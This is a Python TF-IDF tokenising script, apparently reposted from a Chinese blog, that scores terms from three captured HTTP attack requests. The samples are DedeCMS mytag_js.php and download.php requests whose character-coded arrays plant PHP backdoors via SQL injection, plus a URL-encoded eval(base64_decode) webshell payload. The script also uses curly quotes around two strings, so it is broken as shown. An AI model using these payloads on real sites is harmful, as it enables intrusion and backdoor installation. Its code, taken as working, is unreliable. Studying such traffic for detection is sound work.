# tf-idf实例一 (TF-IDF example 1)

#!/usr/bin/env python

# -*- coding: utf-8 -*-

import nltk
import math
import jieba
import string
from nltk.corpus import stopwords
from collections import Counter
from nltk.stem.porter import *
from sklearn.feature_extraction.text import TfidfVectorizer

text1 = “http://www.10100000.com/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59
&arrs2[]=0 GET /plus/mytag_js.php?arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=109&arrs2%5B%5D=115&arrs2%5B%5D=32&arrs2%5B%5D=53&arrs2%5B%5D=46&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=48&arrs2%5B%5D=100&arrs2%5B%5D=97&arrs2%5B%5D=121&arrs2%5B%5D=60&arrs2%5B%5D=98&arrs2%5B%5D=114&arrs2%5B%5D=62&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=46&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=103&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=59&dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120 HTTP/1.1\r\nhost: www.10100000.com\r\nx-forwarded-for: 178.156.202.20\r\nreferer: 
http://www.10100000.com/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=
0\r\nuser-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\r\nflow-info: eyJhcHBfbmFtZSI6ICJwYTE4LXNob3AtY2MtaW50ZXJuZXQiLCAidW5peF90aW1lIjogMTU3NDYwODM4MC4wMTUsICJhc3NldCI6ICIifQ==\r\nConnection: keep-alive\r\nAccept: /\r\nAccept-Encoding: gzip, deflate\r\n\r\n”
# Flatten the raw record held in ``text1`` into space-separated chunks so the
# tokeniser below sees word boundaries instead of URL/HTTP punctuation.
# A CRLF pair is collapsed to a single space first; after that every remaining
# "\n", "/", "?", ".", "&", ":" and "%" is mapped to one space in a single
# pass.  "=" is deliberately kept (its replacement was disabled by the author).
text = text1.replace("\r\n", " ").translate(
    str.maketrans(dict.fromkeys("\n/?.&:%", " "))
)
print("text:", text)

#tokens_text = get_tokens(text)
#print(type(tokens_text),tokens_text)

# Tokenise the normalised first document with jieba and count its tokens.
cut_elements = jieba.cut(text)
# Tokens of length 1 are discarded; everything else is kept in order.
text_list = [token for token in cut_elements if len(token) != 1]
print(text_list)
# Per-document term counts, used later as the "document" for TF-IDF.
counter1 = Counter(text_list)
print("counter1", counter1)

# Second sample document: two Chinese words followed by a URL-encoded payload.
text2 = "中国 美国 ysy=%40session_start%28%29%3B%24_SESSION%5Bchr%2890%29%5D%3D%24_POST%5Bchr%28124%29%5D%3B%40eval%28base64_decode%28%24_SESSION%5Bchr%2890%29%5D%29%29%3Bdie%28%29%3B&|=ZWNobyAie3JvYm90fSI7"
# Same normalisation as for the first document: collapse CRLF to one space,
# then map "\n", "/", "?", ".", "&", ":" and "%" to a space in one pass.
# "=" is deliberately kept (its replacement was disabled by the author).
text = text2.replace("\r\n", " ").translate(
    str.maketrans(dict.fromkeys("\n/?.&:%", " "))
)
print("text:", text)

# Tokenise the normalised second document with jieba and count its tokens.
cut_elements = jieba.cut(text)
# Debug output: shows what kind of object jieba.cut() returned (printed
# before the tokens are consumed below).
print("type cut_elements:", type(cut_elements), cut_elements)
# Tokens of length 1 are discarded; everything else is kept in order.
text_list = [token for token in cut_elements if len(token) != 1]
print(text_list)
# Per-document term counts, used later as the "document" for TF-IDF.
counter2 = Counter(text_list)
print("counter2:", counter2)

text3 = “GET /plus/download.php?arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=109&arrs2%5B%5D=111&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&ar=True&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&open=1 HTTP/1.1\r\nhost: www.ph.com.cn\r\nx-forwarded-for: 154.92.246.226\r\ncontent-type: text/html\r\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\r\nflow-info: eyJhcHBfbmFtZSI6ICJpZi1waC13d3ciLCAidW5peF90aW1lIjogMTU3NDU5OTg1Ni4wMjksICJhc3NldCI6ICIxNzIuMjUuMjM2LjcifQ==\r\nConnection: keep-alive\r\nAccept: /\r\nAccept-Encoding: gzip, deflate\r\n\r\n”
# Flatten the raw record held in ``text3`` the same way as the other samples:
# collapse CRLF to one space, then map "\n", "/", "?", ".", "&", ":" and "%"
# to a space in a single pass.  "=" is deliberately kept (its replacement was
# disabled by the author).
text = text3.replace("\r\n", " ").translate(
    str.maketrans(dict.fromkeys("\n/?.&:%", " "))
)
print("text:", text)

# Tokenise the normalised third document with jieba and count its tokens.
cut_elements = jieba.cut(text)
# Tokens of length 1 are discarded; everything else is kept in order.
text_list = [token for token in cut_elements if len(token) != 1]
print(text_list)
# Per-document term counts, used later as the "document" for TF-IDF.
counter3 = Counter(text_list)
print("counter3:", counter3)
# Dump the three per-document counters side by side for inspection.
print("############ all counter:")
print(counter1, counter2, counter3)

def tf(word, count):
    """Return the term frequency of *word* within a single document.

    Args:
        word: The token to look up.
        count: Mapping of token -> occurrence count for one document.  The
            call site in this file passes ``collections.Counter`` objects,
            for which a missing *word* counts as 0.

    Returns:
        ``count[word]`` divided by the total number of counted tokens, or
        ``0.0`` when the document has no tokens at all.
    """
    total = sum(count.values())
    # An empty document would otherwise raise ZeroDivisionError.
    if not total:
        return 0.0
    return count[word] / total

def n_containing(word, count_list):
    """Return the number of documents in *count_list* that contain *word*.

    Args:
        word: The token to look for.
        count_list: Iterable of per-document containers (this file passes
            ``Counter`` objects); membership is tested with ``in``.

    Returns:
        How many entries of *count_list* have *word* as a member.
    """
    return sum(1 for count in count_list if word in count)

# [blog page residue, not part of the program] 扫描二维码关注公众号,回复: 8645315 查看本文章

def idf(word, count_list):
    """Return the inverse document frequency of *word* over a corpus.

    Computed as ``log(N / (1 + df))`` with the natural logarithm, where ``N``
    is ``len(count_list)`` and ``df`` is the number of documents containing
    *word* (see ``n_containing``).

    Args:
        word: The token to score.
        count_list: Sized collection of per-document term counters.

    Returns:
        The IDF as a float, or ``0.0`` for an empty corpus.  The value is
        negative when *word* occurs in every document, because the ``1 +``
        in the denominator then exceeds ``N``.
    """
    # With no documents the ratio is 0 and math.log(0) raises ValueError.
    if not count_list:
        return 0.0
    # The "1 +" keeps the denominator non-zero for words seen in no document.
    return math.log(len(count_list) / (1 + n_containing(word, count_list)))

def tfidf(word, count, count_list):
    """Return the TF-IDF score of *word* for one document of a corpus.

    Args:
        word: The token to score.
        count: Term counter of the document being scored.
        count_list: Collection of term counters for every document in the
            corpus.

    Returns:
        ``tf(word, count) * idf(word, count_list)``.
    """
    return tf(word, count) * idf(word, count_list)

# The corpus: one term counter per sample document.
countlist = [counter1, counter2, counter3]
print(type(counter3), len(counter1))
# Counter returns 0 for a missing key, so this is safe even if "GET" was
# never produced as a token.
print(counter3["GET"])

# Score every distinct token of each document against the whole corpus.
for i, count in enumerate(countlist):
    print("Top words in document {}".format(i + 1))
    scores = {word: tfidf(word, count, countlist) for word in count}
    # Order by descending score so the output matches the "Top words" header;
    # the printed mapping holds exactly the same word -> score pairs.
    scores = dict(sorted(scores.items(), key=lambda item: item[1], reverse=True))
    print("scores:", scores)

# [blog page residue, not part of the program]
# 发布了114 篇原创文章 · 获赞 18 · 访问量 3万+
#
# 猜你喜欢
#
# 转载自blog.csdn.net/WangYouJin321/article/details/103987073